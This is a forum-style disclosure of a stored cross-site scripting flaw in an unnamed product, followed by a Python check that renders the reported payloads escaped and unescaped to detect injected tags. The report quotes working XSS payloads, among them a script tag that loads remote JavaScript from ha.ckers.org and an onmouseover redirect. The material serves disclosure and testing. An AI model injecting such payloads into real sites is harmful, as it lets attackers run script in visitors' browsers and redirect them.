Hi there,
I tested a little and found a bigger problem with XSS.
In XXXinfo-removedXXXXX a user could enter scripting like
<script>alert(1)</script>
and if you save it .... voila, there goes your MessageBox.
Kindly fix this asap! I have not much time to test more stuff atm,
but I am sure there is a way to do more harm and inject stuff...
e.g. enter this for value!!!
<SCRIPT SRC=ha.ckers.org/xss.js></SCRIPT>
or:
<IMG SRC=www.bamigo-bamberg.net/wp-content/uploads/anonymous.png>
leads to attached picture:
<A HREF="173.194.69.94/">XSS</A>
Will set a link to google....
as well as: <A HREF="0xad.0xc2.0x45.0x5e/">XSS</A>
and a last test: <h2 onmouseover=javascript:window.location="www.google.com";>test-hoverme
shows up like this and forces google.com to open on hover:
!!!Only posted to inform you & protect your fantastic product + its customers!!!
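A defender-side check for the issue described in this post, as an added example that is not code from the original post or from the product: it renders each payload quoted above through the unescaped pattern the report describes and through an HTML-encoded one, then lists any tag in the output that the template itself did not put there. The template markup and the `render_*` function names are assumptions for illustration.

```python
import html
import re

# Payloads quoted in the report above, used here as constructed test inputs.
REPORTED_PAYLOADS = [
    '<script>alert(1)</script>',
    '<SCRIPT SRC=ha.ckers.org/xss.js></SCRIPT>',
    '<IMG SRC=www.bamigo-bamberg.net/wp-content/uploads/anonymous.png>',
    '<A HREF="173.194.69.94/">XSS</A>',
    '<A HREF="0xad.0xc2.0x45.0x5e/">XSS</A>',
    '<h2 onmouseover=javascript:window.location="www.google.com";>test-hoverme',
]

# Tags the (assumed) template is allowed to emit on its own.
TEMPLATE_TAGS = {'<div class="msg">', '</div>'}
ATTR_TEMPLATE_TAGS = {'</span>'}
TAG_RE = re.compile(r'<[^>]+>')


def render_message_box_unsafe(value: str) -> str:
    """The pattern the report implies: stored value pasted straight into HTML."""
    return f'<div class="msg">{value}</div>'


def render_message_box(value: str) -> str:
    """Hardened version: encode for the HTML text context before inserting."""
    return f'<div class="msg">{html.escape(value, quote=True)}</div>'


def render_attr(value: str) -> str:
    """Same value inside a quoted attribute; quote=True also encodes the quotes
    so the value cannot close the attribute and add onmouseover-style handlers."""
    return f'<span title="{html.escape(value, quote=True)}">message</span>'


def injected_tags(rendered: str, allowed: set = frozenset(TEMPLATE_TAGS)) -> list:
    """Every tag-looking token in the output that the template did not produce.
    An empty list means the user value was rendered as inert text."""
    return [tag for tag in TAG_RE.findall(rendered) if tag not in allowed]


if __name__ == "__main__":
    for payload in REPORTED_PAYLOADS:
        print(payload)
        print("  unsafe :", injected_tags(render_message_box_unsafe(payload)))
        print("  escaped:", injected_tags(render_message_box(payload)))
```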